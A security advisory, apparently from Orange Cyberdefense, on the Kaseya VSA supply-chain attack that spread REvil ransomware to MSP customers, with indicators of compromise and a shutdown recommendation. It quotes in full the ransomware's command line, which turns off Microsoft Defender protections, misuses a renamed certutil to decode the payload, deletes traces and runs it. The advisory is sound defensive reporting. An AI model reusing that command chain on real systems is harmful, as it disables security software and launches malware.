Currently there is a widespread ongoing supply chain attack targeting MSPs by using Kaseya VSA to distribute a version of REvil ransomware on to customers environments. At this time there are multiple MSPs that have been hit as part of this. Kaseya VSA is both a cloud-based and on-premises MSP platform used for patch management and client monitoring.
Kaseya has issued a security advisory urging customers running the on-premises solution to shutdown their servers running VSA until further notice. It is critical that this is done as soon as possible since one of the first things the ransomware does is to disable administrative access to the VSA.
How it works
An automatic update was pushed to the product that included the REvil ransomware.
The ransomware will start of by running the following command:
“cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
This will severly cripple Microsoft Defender and disable functionality that would otherwise most likely have prevented the ransomware.
After that it will decode c:\kworking\agent.crt and extract agent.exe which contains the files MsMpEng.exe and mpsvc.dll. The first file is a legitimate version of Microsoft Defender and the second one is the REvil encryptor payload that will make use of sideloading and inject itself into the legitimate Windows Defender exectuable and through that, encrypt the system.
D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
C:\kworking\agent.exe
C:\Windows\mpsvc.dll
More IoCs
Recommendation
Orange Cyberdefense recommends immediately shutting down servers running Kaseya VSA and to follow further official updates from Kaseya.
References
REvil ransomware hits 200 companies in MSP supply-chain attack
REvil ransomware gang executes supply chain attack via malicious Kaseya update
Kaseya supply chain attack delivers mass ransomware event to US companies